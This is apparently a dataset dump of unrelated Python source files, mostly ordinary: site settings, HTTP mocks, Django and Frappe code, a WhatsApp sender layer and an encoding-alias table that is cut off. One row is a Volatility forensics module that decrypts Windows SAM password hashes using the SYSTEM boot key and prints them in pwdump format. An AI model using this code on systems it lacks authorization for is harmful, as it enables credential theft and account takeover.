code
stringlengths 1
199k
|
|---|
import os
ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
LAYOUT_DIR = os.path.join(ROOT_PATH, 'layout')
CONTENT_DIR = os.path.join(ROOT_PATH, 'content')
MEDIA_DIR = os.path.join(ROOT_PATH, 'media')
DEPLOY_DIR = os.path.join(ROOT_PATH, 'deploy')
TMP_DIR = os.path.join(ROOT_PATH, 'deploy_tmp')
BACKUPS_DIR = os.path.join(ROOT_PATH, 'backups')
BACKUP = False
SITE_ROOT = "/"
SITE_WWW_URL = "http://www.yoursite.com"
SITE_NAME = "Your Site"
SITE_AUTHOR = "Your Name"
GENERATE_ABSOLUTE_FS_URLS = False
GENERATE_CLEAN_URLS = False
LISTING_PAGE_NAMES = ['listing', 'index', 'default']
APPEND_SLASH = False
MEDIA_PROCESSORS = {
'*': {
'.css': ('hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.YUICompressor',),
'.ccss': ('hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.CleverCSS',
'hydeengine.media_processors.YUICompressor',),
'.sass': ('hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.SASS',
'hydeengine.media_processors.YUICompressor',),
'.less': ('hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.LessCSS',
'hydeengine.media_processors.YUICompressor',),
'.styl':('hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.Stylus',
'hydeengine.media_processors.CSSmin',),
'.hss': (
'hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.HSS',
'hydeengine.media_processors.YUICompressor',),
'.js': (
'hydeengine.media_processors.TemplateProcessor',
'hydeengine.media_processors.YUICompressor',)
}
}
CONTENT_PROCESSORS = {
'prerendered/': {
'*.*' : ('hydeengine.content_processors.PassthroughProcessor',)
}
}
SITE_POST_PROCESSORS = {
# 'media/js': {
# 'hydeengine.site_post_processors.FolderFlattener' : {
# 'remove_processed_folders': True,
# 'pattern':"*.js"
# }
# }
}
CONTEXT = {
'GENERATE_CLEAN_URLS': GENERATE_CLEAN_URLS
}
FILTER = {
'include': (".htaccess",),
'exclude': (".*", "*~")
}
GROWL = None
YUI_COMPRESSOR = "./lib/yuicompressor-2.4.2.jar"
CLOSURE_COMPRILER = None
HSS_PATH = None # If you don't want to use HSS
TEMPLATE_DIRS = (LAYOUT_DIR, CONTENT_DIR, TMP_DIR, MEDIA_DIR)
INSTALLED_APPS = (
'hydeengine',
'django.contrib.webdesign',
)
|
def f():
for i in []:
pass
else:
<caret>
|
""" Unit test suite for daemon package.
"""
import scaffold
suite = scaffold.make_suite()
|
import copy
import httplib2
class fake_httplib2(object):
def __init__(self, return_type=None, *args, **kwargs):
self.return_type = return_type
def request(self, uri, method="GET", body=None, headers=None,
redirections=5, connection_type=None):
if not self.return_type:
fake_headers = httplib2.Response(headers)
return_obj = {
'uri': uri,
'method': method,
'body': body,
'headers': headers
}
return (fake_headers, return_obj)
elif isinstance(self.return_type, int):
body = "fake_body"
header_info = {
'content-type': 'text/plain',
'status': str(self.return_type),
'content-length': len(body)
}
resp_header = httplib2.Response(header_info)
return (resp_header, body)
else:
msg = "unsupported return type %s" % self.return_type
raise TypeError(msg)
class fake_httplib(object):
def __init__(self, headers, body=None,
version=1.0, status=200, reason="Ok"):
"""
:param headers: dict representing HTTP response headers
:param body: file-like object
:param version: HTTP Version
:param status: Response status code
:param reason: Status code related message.
"""
self.body = body
self.status = status
self.reason = reason
self.version = version
self.headers = headers
def getheaders(self):
return copy.deepcopy(self.headers).items()
def getheader(self, key, default):
return self.headers.get(key, default)
def read(self, amt):
return self.body.read(amt)
|
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: bdolangavitt@wesleyan.edu
"""
import volatility.obj as obj
import volatility.win32.rawreg as rawreg
import volatility.win32.hive as hive
from Crypto.Hash import MD5, MD4
from Crypto.Cipher import ARC4, DES
from struct import unpack, pack
odd_parity = [
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110,
112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127,
128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143,
145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158,
161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174,
176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191,
193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206,
208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223,
224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239,
241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254
]
p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
anum = "0123456789012345678901234567890123456789\0"
antpassword = "NTPASSWORD\0"
almpassword = "LMPASSWORD\0"
lmkey = "KGS!@#$%"
empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
def str_to_key(s):
key = []
key.append(ord(s[0]) >> 1)
key.append(((ord(s[0]) & 0x01) << 6) | (ord(s[1]) >> 2))
key.append(((ord(s[1]) & 0x03) << 5) | (ord(s[2]) >> 3))
key.append(((ord(s[2]) & 0x07) << 4) | (ord(s[3]) >> 4))
key.append(((ord(s[3]) & 0x0F) << 3) | (ord(s[4]) >> 5))
key.append(((ord(s[4]) & 0x1F) << 2) | (ord(s[5]) >> 6))
key.append(((ord(s[5]) & 0x3F) << 1) | (ord(s[6]) >> 7))
key.append(ord(s[6]) & 0x7F)
for i in range(8):
key[i] = (key[i] << 1)
key[i] = odd_parity[key[i]]
return "".join(chr(k) for k in key)
def sid_to_key(sid):
s1 = ""
s1 += chr(sid & 0xFF)
s1 += chr((sid >> 8) & 0xFF)
s1 += chr((sid >> 16) & 0xFF)
s1 += chr((sid >> 24) & 0xFF)
s1 += s1[0]
s1 += s1[1]
s1 += s1[2]
s2 = s1[3] + s1[0] + s1[1] + s1[2]
s2 += s2[0] + s2[1] + s2[2]
return str_to_key(s1), str_to_key(s2)
def hash_lm(pw):
pw = pw[:14].upper()
pw = pw + ('\0' * (14 - len(pw)))
d1 = DES.new(str_to_key(pw[:7]), DES.MODE_ECB)
d2 = DES.new(str_to_key(pw[7:]), DES.MODE_ECB)
return d1.encrypt(lmkey) + d2.encrypt(lmkey)
def hash_nt(pw):
return MD4.new(pw.encode('utf-16-le')).digest()
def find_control_set(sysaddr):
root = rawreg.get_root(sysaddr)
if not root:
return 1
csselect = rawreg.open_key(root, ["Select"])
if not csselect:
return 1
for v in rawreg.values(csselect):
if v.Name == "Current":
return v.Data
def get_bootkey(sysaddr):
cs = find_control_set(sysaddr)
lsa_base = ["ControlSet{0:03}".format(cs), "Control", "Lsa"]
lsa_keys = ["JD", "Skew1", "GBG", "Data"]
root = rawreg.get_root(sysaddr)
if not root:
return None
lsa = rawreg.open_key(root, lsa_base)
if not lsa:
return None
bootkey = ""
for lk in lsa_keys:
key = rawreg.open_key(lsa, [lk])
class_data = sysaddr.read(key.Class, key.ClassLength)
bootkey += class_data.decode('utf-16-le').decode('hex')
bootkey_scrambled = ""
for i in range(len(bootkey)):
bootkey_scrambled += bootkey[p[i]]
return bootkey_scrambled
def get_hbootkey(samaddr, bootkey):
sam_account_path = ["SAM", "Domains", "Account"]
if not bootkey:
return None
root = rawreg.get_root(samaddr)
if not root:
return None
sam_account_key = rawreg.open_key(root, sam_account_path)
if not sam_account_key:
return None
F = None
for v in rawreg.values(sam_account_key):
if v.Name == 'F':
F = samaddr.read(v.Data, v.DataLength)
if not F:
return None
md5 = MD5.new()
md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
rc4_key = md5.digest()
rc4 = ARC4.new(rc4_key)
hbootkey = rc4.encrypt(F[0x80:0xA0])
return hbootkey
def get_user_keys(samaddr):
user_key_path = ["SAM", "Domains", "Account", "Users"]
root = rawreg.get_root(samaddr)
if not root:
return []
user_key = rawreg.open_key(root, user_key_path)
if not user_key:
return []
return [k for k in rawreg.subkeys(user_key) if k.Name != "Names"]
def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
(des_k1, des_k2) = sid_to_key(rid)
d1 = DES.new(des_k1, DES.MODE_ECB)
d2 = DES.new(des_k2, DES.MODE_ECB)
md5 = MD5.new()
md5.update(hbootkey[:0x10] + pack("<L", rid) + lmntstr)
rc4_key = md5.digest()
rc4 = ARC4.new(rc4_key)
obfkey = rc4.encrypt(enc_hash)
hash = d1.decrypt(obfkey[:8]) + d2.decrypt(obfkey[8:])
return hash
def decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey):
# LM Hash
if enc_lm_hash:
lmhash = decrypt_single_hash(rid, hbootkey, enc_lm_hash, almpassword)
else:
lmhash = ""
# NT Hash
if enc_nt_hash:
nthash = decrypt_single_hash(rid, hbootkey, enc_nt_hash, antpassword)
else:
nthash = ""
return lmhash, nthash
def encrypt_single_hash(rid, hbootkey, hash, lmntstr):
(des_k1, des_k2) = sid_to_key(rid)
d1 = DES.new(des_k1, DES.MODE_ECB)
d2 = DES.new(des_k2, DES.MODE_ECB)
enc_hash = d1.encrypt(hash[:8]) + d2.encrypt(hash[8:])
md5 = MD5.new()
md5.update(hbootkey[:0x10] + pack("<L", rid) + lmntstr)
rc4_key = md5.digest()
rc4 = ARC4.new(rc4_key)
obfkey = rc4.encrypt(enc_hash)
return obfkey
def encrypt_hashes(rid, lm_hash, nt_hash, hbootkey):
# LM Hash
if lm_hash:
enc_lmhash = encrypt_single_hash(rid, hbootkey, lm_hash, almpassword)
else:
enc_lmhash = ""
# NT Hash
if nt_hash:
enc_nthash = encrypt_single_hash(rid, hbootkey, nt_hash, antpassword)
else:
enc_nthash = ""
return enc_lmhash, enc_nthash
def get_user_hashes(user_key, hbootkey):
samaddr = user_key.obj_vm
rid = int(str(user_key.Name), 16)
V = None
for v in rawreg.values(user_key):
if v.Name == 'V':
V = samaddr.read(v.Data, v.DataLength)
if not V:
return None
lm_offset = unpack("<L", V[0x9c:0xa0])[0] + 0xCC + 4
lm_len = unpack("<L", V[0xa0:0xa4])[0] - 4
nt_offset = unpack("<L", V[0xa8:0xac])[0] + 0xCC + 4
nt_len = unpack("<L", V[0xac:0xb0])[0] - 4
if lm_len:
enc_lm_hash = V[lm_offset:lm_offset + 0x10]
else:
enc_lm_hash = ""
if nt_len:
enc_nt_hash = V[nt_offset:nt_offset + 0x10]
else:
enc_nt_hash = ""
return decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey)
def get_user_name(user_key):
samaddr = user_key.obj_vm
V = None
for v in rawreg.values(user_key):
if v.Name == 'V':
V = samaddr.read(v.Data, v.DataLength)
if not V:
return None
name_offset = unpack("<L", V[0x0c:0x10])[0] + 0xCC
name_length = unpack("<L", V[0x10:0x14])[0]
username = V[name_offset:name_offset + name_length].decode('utf-16-le')
return username
def get_user_desc(user_key):
samaddr = user_key.obj_vm
V = None
for v in rawreg.values(user_key):
if v.Name == 'V':
V = samaddr.read(v.Data, v.DataLength)
if not V:
return None
desc_offset = unpack("<L", V[0x24:0x28])[0] + 0xCC
desc_length = unpack("<L", V[0x28:0x2c])[0]
desc = V[desc_offset:desc_offset + desc_length].decode('utf-16-le')
return desc
def dump_hashes(sysaddr, samaddr):
bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr, bootkey)
if hbootkey:
for user in get_user_keys(samaddr):
ret = get_user_hashes(user, hbootkey)
if not ret:
yield obj.NoneObject("Cannot get user hashes for {0}".format(user))
else:
lmhash, nthash = ret
if not lmhash:
lmhash = empty_lm
if not nthash:
nthash = empty_nt
yield "{0}:{1}:{2}:{3}:::".format(get_user_name(user), int(str(user.Name), 16),
lmhash.encode('hex'), nthash.encode('hex'))
else:
yield obj.NoneObject("Hbootkey is not valid")
def dump_memory_hashes(addr_space, config, syshive, samhive):
sysaddr = hive.HiveAddressSpace(addr_space, config, syshive)
samaddr = hive.HiveAddressSpace(addr_space, config, samhive)
return dump_hashes(sysaddr, samaddr)
def dump_file_hashes(syshive_fname, samhive_fname):
sysaddr = hive.HiveFileAddressSpace(syshive_fname)
samaddr = hive.HiveFileAddressSpace(samhive_fname)
return dump_hashes(sysaddr, samaddr)
|
from yowsup.layers.interface import YowInterfaceLayer, ProtocolEntityCallback
from yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity
import threading
import logging
logger = logging.getLogger(__name__)
class SendLayer(YowInterfaceLayer):
#This message is going to be replaced by the @param message in YowsupSendStack construction
#i.e. list of (jid, message) tuples
PROP_MESSAGES = "org.openwhatsapp.yowsup.prop.sendclient.queue"
def __init__(self):
super(SendLayer, self).__init__()
self.ackQueue = []
self.lock = threading.Condition()
#call back function when there is a successful connection to whatsapp server
@ProtocolEntityCallback("success")
def onSuccess(self, successProtocolEntity):
self.lock.acquire()
for target in self.getProp(self.__class__.PROP_MESSAGES, []):
#getProp() is trying to retreive the list of (jid, message) tuples, if none exist, use the default []
phone, message = target
if '@' in phone:
messageEntity = TextMessageProtocolEntity(message, to = phone)
elif '-' in phone:
messageEntity = TextMessageProtocolEntity(message, to = "%s@g.us" % phone)
else:
messageEntity = TextMessageProtocolEntity(message, to = "%s@s.whatsapp.net" % phone)
#append the id of message to ackQueue list
#which the id of message will be deleted when ack is received.
self.ackQueue.append(messageEntity.getId())
self.toLower(messageEntity)
self.lock.release()
#after receiving the message from the target number, target number will send a ack to sender(us)
@ProtocolEntityCallback("ack")
def onAck(self, entity):
self.lock.acquire()
#if the id match the id in ackQueue, then pop the id of the message out
if entity.getId() in self.ackQueue:
self.ackQueue.pop(self.ackQueue.index(entity.getId()))
if not len(self.ackQueue):
self.lock.release()
logger.info("Message sent")
raise KeyboardInterrupt()
self.lock.release()
|
from __future__ import unicode_literals
import frappe
def execute():
frappe.db.sql("""update
`tabTimesheet` as ts,
(
select min(from_time)as from_time, max(to_time) as to_time, parent from `tabTimesheet Detail` group by parent
) as tsd
set ts.status = 'Submitted', ts.start_date = tsd.from_time, ts.end_date = tsd.to_time
where tsd.parent = ts.name and ts.status = 'Draft' and ts.docstatus =1""")
|
import os
import warnings
from collections import Counter, OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils import lru_cache
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
from django.utils.module_loading import import_string
class InvalidTemplateEngineError(ImproperlyConfigured):
pass
class EngineHandler(object):
def __init__(self, templates=None):
"""
templates is an optional list of template engine definitions
(structured like settings.TEMPLATES).
"""
self._templates = templates
self._engines = {}
@cached_property
def templates(self):
if self._templates is None:
self._templates = settings.TEMPLATES
if not self._templates:
warnings.warn(
"You haven't defined a TEMPLATES setting. You must do so "
"before upgrading to Django 1.10. Otherwise Django will be "
"unable to load templates.", RemovedInDjango110Warning)
self._templates = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': settings.TEMPLATE_DIRS,
'OPTIONS': {
'allowed_include_roots': settings.ALLOWED_INCLUDE_ROOTS,
'context_processors': settings.TEMPLATE_CONTEXT_PROCESSORS,
'debug': settings.TEMPLATE_DEBUG,
'loaders': settings.TEMPLATE_LOADERS,
'string_if_invalid': settings.TEMPLATE_STRING_IF_INVALID,
},
},
]
templates = OrderedDict()
backend_names = []
for tpl in self._templates:
tpl = tpl.copy()
try:
# This will raise an exception if 'BACKEND' doesn't exist or
# isn't a string containing at least one dot.
default_name = tpl['BACKEND'].rsplit('.', 2)[-2]
except Exception:
invalid_backend = tpl.get('BACKEND', '<not defined>')
raise ImproperlyConfigured(
"Invalid BACKEND for a template engine: {}. Check "
"your TEMPLATES setting.".format(invalid_backend))
tpl.setdefault('NAME', default_name)
tpl.setdefault('DIRS', [])
tpl.setdefault('APP_DIRS', False)
tpl.setdefault('OPTIONS', {})
templates[tpl['NAME']] = tpl
backend_names.append(tpl['NAME'])
counts = Counter(backend_names)
duplicates = [alias for alias, count in counts.most_common() if count > 1]
if duplicates:
raise ImproperlyConfigured(
"Template engine aliases aren't unique, duplicates: {}. "
"Set a unique NAME for each engine in settings.TEMPLATES."
.format(", ".join(duplicates)))
return templates
def __getitem__(self, alias):
try:
return self._engines[alias]
except KeyError:
try:
params = self.templates[alias]
except KeyError:
raise InvalidTemplateEngineError(
"Could not find config for '{}' "
"in settings.TEMPLATES".format(alias))
# If importing or initializing the backend raises an exception,
# self._engines[alias] isn't set and this code may get executed
# again, so we must preserve the original params. See #24265.
params = params.copy()
backend = params.pop('BACKEND')
engine_cls = import_string(backend)
engine = engine_cls(params)
self._engines[alias] = engine
return engine
def __iter__(self):
return iter(self.templates)
def all(self):
return [self[alias] for alias in self]
@lru_cache.lru_cache()
def get_app_template_dirs(dirname):
"""
Return an iterable of paths of directories to load app templates from.
dirname is the name of the subdirectory containing templates inside
installed applications.
"""
template_dirs = []
for app_config in apps.get_app_configs():
if not app_config.path:
continue
template_dir = os.path.join(app_config.path, dirname)
if os.path.isdir(template_dir):
template_dirs.append(upath(template_dir))
# Immutable return value because it will be cached and shared by callers.
return tuple(template_dirs)
|
""" Encoding Aliases Support
This module is used by the encodings package search function to
map encodings names to module names.
Note that the search function normalizes the encoding names before
doing the lookup, so the mapping will have to map normalized
encoding names to module names.
Contents:
The following aliases dictionary contains mappings of all IANA
character set names for which the Python core library provides
codecs. In addition to these, a few Python specific codec
aliases have also been added.
"""
aliases = {
# Please keep this list sorted alphabetically by value !
# ascii codec
'646' : 'ascii',
'ansi_x3.4_1968' : 'ascii',
'ansi_x3_4_1968' : 'ascii', # some email headers use this non-standard name
'ansi_x3.4_1986' : 'ascii',
'cp367' : 'ascii',
'csascii' : 'ascii',
'ibm367' : 'ascii',
'iso646_us' : 'ascii',
'iso_646.irv_1991' : 'ascii',
'iso_ir_6' : 'ascii',
'us' : 'ascii',
'us_ascii' : 'ascii',
## base64_codec codec
#'base64' : 'base64_codec',
#'base_64' : 'base64_codec',
# big5 codec
'big5_tw' : 'big5',
'csbig5' : 'big5',
# big5hkscs codec
'big5_hkscs' : 'big5hkscs',
'hkscs' : 'big5hkscs',
## bz2_codec codec
#'bz2' : 'bz2_codec',
# cp037 codec
'037' : 'cp037',
'csibm037' : 'cp037',
'ebcdic_cp_ca' : 'cp037',
'ebcdic_cp_nl' : 'cp037',
'ebcdic_cp_us' : 'cp037',
'ebcdic_cp_wt' : 'cp037',
'ibm037' : 'cp037',
'ibm039' : 'cp037',
# cp1026 codec
'1026' : 'cp1026',
'csibm1026' : 'cp1026',
'ibm1026' : 'cp1026',
# cp1140 codec
'1140' : 'cp1140',
'ibm1140' : 'cp1140',
# cp1250 codec
'1250' : 'cp1250',
'windows_1250' : 'cp1250',
# cp1251 codec
'1251' : 'cp1251',
'windows_1251' : 'cp1251',
# cp1252 codec
'1252' : 'cp1252',
'windows_1252' : 'cp1252',
# cp1253 codec
'1253' : 'cp1253',
'windows_1253' : 'cp1253',
# cp1254 codec
'1254' : 'cp1254',
'windows_1254' : 'cp1254',
# cp1255 codec
'1255' : 'cp1255',
'windows_1255' : 'cp1255',
# cp1256 codec
'1256' : 'cp1256',
'windows_1256' : 'cp1256',
# cp1257 codec
'1257' : 'cp1257',
'windows_1257' : 'cp1257',
# cp1258 codec
'1258' : 'cp1258',
'windows_1258' : 'cp1258',
# cp424 codec
'424' : 'cp424',
'csibm424' : 'cp424',
'ebcdic_cp_he' : 'cp424',
'ibm424' : 'cp424',
# cp437 codec
'437' : 'cp437',
'cspc8codepage437' : 'cp437',
'ibm437' : 'cp437',
# cp500 codec
'500' : 'cp500',
'csibm500' : 'cp500',
'ebcdic_cp_be' : 'cp500',
'ebcdic_cp_ch' : 'cp500',
'ibm500' : 'cp500',
# cp775 codec
'775' : 'cp775',
'cspc775baltic' : 'cp775',
'ibm775' : 'cp775',
# cp850 codec
'850' : 'cp850',
'cspc850multilingual' : 'cp850',
'ibm850' : 'cp850',
# cp852 codec
'852' : 'cp852',
'cspcp852' : 'cp852',
'ibm852' : 'cp852',
# cp855 codec
'855' : 'cp855',
'csibm855' : 'cp855',
'ibm855' : 'cp855',
# cp857 codec
'857' : 'cp857',
'csibm857' : 'cp857',
'ibm857' : 'cp857',
# cp858 codec
'858' : 'cp858',
'csibm858' : 'cp858',
'ibm858' : 'cp858',
# cp860 codec
'860' : 'cp860',
'csibm860' : 'cp860',
'ibm860' : 'cp860',
# cp861 codec
'861' : 'cp861',
'cp_is' : 'cp861',
'csibm861' : 'cp861',
'ibm861' : 'cp861',
# cp862 codec
'862' : 'cp862',
'cspc862latinhebrew' : 'cp862',
'ibm862' : 'cp862',
# cp863 codec
'863' : 'cp863',
'csibm863' : 'cp863',
'ibm863' : 'cp863',
# cp864 codec
'864' : 'cp864',
'csibm864' : 'cp864',
'ibm864' : 'cp864',
# cp865 codec
'865' : 'cp865',
'csibm865' : 'cp865',
'ibm865' : 'cp865',
# cp866 codec
'866' : 'cp866',
'csibm866' : 'cp866',
'ibm866' : 'cp866',
# cp869 codec
'869' : 'cp869',
'cp_gr' : 'cp869',
'csibm869' : 'cp869',
'ibm869' : 'cp869',
# cp932 codec
'932' : 'cp932',
'ms932' : 'cp932',
'mskanji' : 'cp932',
'ms_kanji' : 'cp932',
# cp949 codec
'949' : 'cp949',
'ms949' : 'cp949',
'uhc' : 'cp949',
# cp950 codec
'950' : 'cp950',
'ms950' : 'cp950',
# euc_jis_2004 codec
'jisx0213' : 'euc_jis_2004',
'eucjis2004' : 'euc_jis_2004',
'euc_jis2004' : 'euc_jis_2004',
# euc_jisx0213 codec
'eucjisx0213' : 'euc_jisx0213',
# euc_jp codec
'eucjp' : 'euc_jp',
'ujis' : 'euc_jp',
'u_jis' : 'euc_jp',
# euc_kr codec
'euckr' : 'euc_kr',
'korean' : 'euc_kr',
'ksc5601' : 'euc_kr',
'ks_c_5601' : 'euc_kr',
'ks_c_5601_1987' : 'euc_kr',
'ksx1001' : 'euc_kr',
'ks_x_1001' : 'euc_kr',
# gb18030 codec
'gb18030_2000' : 'gb18030',
# gb2312 codec
'chinese' : 'gb2312',
'csiso58gb231280' : 'gb2312',
'euc_cn' : 'gb2312',
'euccn' : 'gb2312',
'eucgb2312_cn' : 'gb2312',
'gb2312_1980' : 'gb2312',
'gb2312_80' : 'gb2312',
'iso_ir_58' : 'gb2312',
# gbk codec
'936' : 'gbk',
'cp936' : 'gbk',
'ms936' : 'gbk',
## hex_codec codec
#'hex' : 'hex_codec',
# hp_roman8 codec
'roman8' : 'hp_roman8',
'r8' : 'hp_roman8',
'csHPRoman8' : 'hp_roman8',
# hz codec
'hzgb' : 'hz',
'hz_gb' : 'hz',
'hz_gb_2312' : 'hz',
# iso2022_jp codec
'csiso2022jp' : 'iso2022_jp',
'iso2022jp' : 'iso2022_jp',
'iso_2022_jp' : 'iso2022_jp',
# iso2022_jp_1 codec
'iso2022jp_1' : 'iso2022_jp_1',
'iso_2022_jp_1' : 'iso2022_jp_1',
# iso2022_jp_2 codec
'iso2022jp_2' : 'iso2022_jp_2',
'iso_2022_jp_2' : 'iso2022_jp_2',
# iso2022_jp_2004 codec
'iso_2022_jp_2004' : 'iso2022_jp_2004',
'iso2022jp_2004' : 'iso2022_jp_2004',
# iso2022_jp_3 codec
'iso2022jp_3' : 'iso2022_jp_3',
'iso_2022_jp_3' : 'iso2022_jp_3',
# iso2022_jp_ext codec
'iso2022jp_ext' : 'iso2022_jp_ext',
'iso_2022_jp_ext' : 'iso2022_jp_ext',
# iso2022_kr codec
'csiso2022kr' : 'iso2022_kr',
'iso2022kr' : 'iso2022_kr',
'iso_2022_kr' : 'iso2022_kr',
# iso8859_10 codec
'csisolatin6' : 'iso8859_10',
'iso_8859_10' : 'iso8859_10',
'iso_8859_10_1992' : 'iso8859_10',
'iso_ir_157' : 'iso8859_10',
'l6' : 'iso8859_10',
'latin6' : 'iso8859_10',
# iso8859_11 codec
'thai' : 'iso8859_11',
'iso_8859_11' : 'iso8859_11',
'iso_8859_11_2001' : 'iso8859_11',
# iso8859_13 codec
'iso_8859_13' : 'iso8859_13',
'l7' : 'iso8859_13',
'latin7' : 'iso8859_13',
# iso8859_14 codec
'iso_8859_14' : 'iso8859_14',
'iso_8859_14_1998' : 'iso8859_14',
'iso_celtic' : 'iso8859_14',
'iso_ir_199' : 'iso8859_14',
'l8' : 'iso8859_14',
'latin8' : 'iso8859_14',
# iso8859_15 codec
'iso_8859_15' : 'iso8859_15',
'l9' : 'iso8859_15',
'latin9' : 'iso8859_15',
# iso8859_16 codec
'iso_8859_16' : 'iso8859_16',
'iso_8859_16_2001' : 'iso8859_16',
'iso_ir_226' : 'iso8859_16',
'l10' : 'iso8859_16',
'latin10' : 'iso8859_16',
# iso8859_2 codec
'csisolatin2' : 'iso8859_2',
'iso_8859_2' : 'iso8859_2',
'iso_8859_2_1987' : 'iso8859_2',
'iso_ir_101' : 'iso8859_2',
'l2' : 'iso8859_2',
'latin2' : 'iso8859_2',
# iso8859_3 codec
'csisolatin3' : 'iso8859_3',
'iso_8859_3' : 'iso8859_3',
'iso_8859_3_1988' : 'iso8859_3',
'iso_ir_109' : 'iso8859_3',
'l3' : 'iso8859_3',
'latin3' : 'iso8859_3',
# iso8859_4 codec
'csisolatin4' : 'iso8859_4',
'iso_8859_4' : 'iso8859_4',
'iso_8859_4_1988' : 'iso8859_4',
'iso_ir_110' : 'iso8859_4',
'l4' : 'iso8859_4',
'latin4' : 'iso8859_4',
# iso8859_5 codec
'csisolatincyrillic' : 'iso8859_5',
'cyrillic' : 'iso8859_5',
'iso_8859_5' : 'iso8859_5',
'iso_8859_5_1988' : 'iso8859_5',
'iso_ir_144' : 'iso8859_5',
# iso8859_6 codec
'arabic' : 'iso8859_6',
'asmo_708' : 'iso8859_6',
'csisolatinarabic' : 'iso8859_6',
'ecma_114' : 'iso8859_6',
'iso_8859_6' : 'iso8859_6',
'iso_8859_6_1987' : 'iso8859_6',
'iso_ir_127' : 'iso8859_6',
# iso8859_7 codec
'csisolatingreek' : 'iso8859_7',
'ecma_118' : 'iso8859_7',
'elot_928' : 'iso8859_7',
'greek' : 'iso8859_7',
'greek8' : 'iso8859_7',
'iso_8859_7' : 'iso8859_7',
'iso_8859_7_1987' : 'iso8859_7',
'iso_ir_126' : 'iso8859_7',
# iso8859_8 codec
'csisolatinhebrew' : 'iso8859_8',
'hebrew' : 'iso8859_8',
'iso_8859_8' : 'iso8859_8',
'iso_8859_8_1988' : 'iso8859_8',
'iso_ir_138' : 'iso8859_8',
# iso8859_9 codec
'csisolatin5' : 'iso8859_9',
'iso_8859_9' : 'iso8859_9',
'iso_8859_9_1989' : 'iso8859_9',
'iso_ir_148' : 'iso8859_9',
'l5' : 'iso8859_9',
'latin5' : 'iso8859_9',
# johab codec
'cp1361' : 'johab',
'ms1361' : 'johab',
# koi8_r codec
'cskoi8r' : 'koi8_r',
# latin_1 codec
#
# Note that the latin_1 codec is implemented internally in C and a
# lot faster than the charmap codec iso8859_1 which uses the same
# encoding. This is why we discourage the use of the iso8859_1
# codec and alias it to latin_1 instead.
#
'8859' : 'latin_1',
'cp819' : 'latin_1',
'csisolatin1' : 'latin_1',
'ibm819' : 'latin_1',
'iso8859' : 'latin_1',
'iso8859_1' : 'latin_1',
'iso_8859_1' : 'latin_1',
'iso_8859_1_1987' : 'latin_1',
'iso_ir_100' : 'latin_1',
'l1' : 'latin_1',
'latin' : 'latin_1',
'latin1' : 'latin_1',
# mac_cyrillic codec
'maccyrillic' : 'mac_cyrillic',
# mac_greek codec
'macgreek' : 'mac_greek',
# mac_iceland codec
'maciceland' : 'mac_iceland',
# mac_latin2 codec
'maccentraleurope' : 'mac_latin2',
'maclatin2' : 'mac_latin2',
# mac_roman codec
'macintosh' : 'mac_roman',
'macroman' : 'mac_roman',
# mac_turkish codec
'macturkish' : 'mac_turkish',
# mbcs codec
'dbcs' : 'mbcs',
# ptcp154 codec
'csptcp154' : 'ptcp154',
'pt154' : 'ptcp154',
'cp154' : 'ptcp154',
'cyrillic_asian' : 'ptcp154',
## quopri_codec codec
#'quopri' : 'quopri_codec',
#'quoted_printable' : 'quopri_codec',
#'quotedprintable' : 'quopri_codec',
## rot_13 codec
#'rot13' : 'rot_13',
# shift_jis codec
'csshiftjis' : 'shift_jis',
'shiftjis' : 'shift_jis',
'sjis' : 'shift_jis',
's_jis' : 'shift_jis',
# shift_jis_2004 codec
'shiftjis2004' : 'shift_jis_2004',
'sjis_2004' : 'shift_jis_2004',
's_jis_2004' : 'shift_jis_2004',
# shift_jisx0213 codec
'shiftjisx0213' : 'shift_jisx0213',
'sjisx0213' : 'shift_jisx0213',
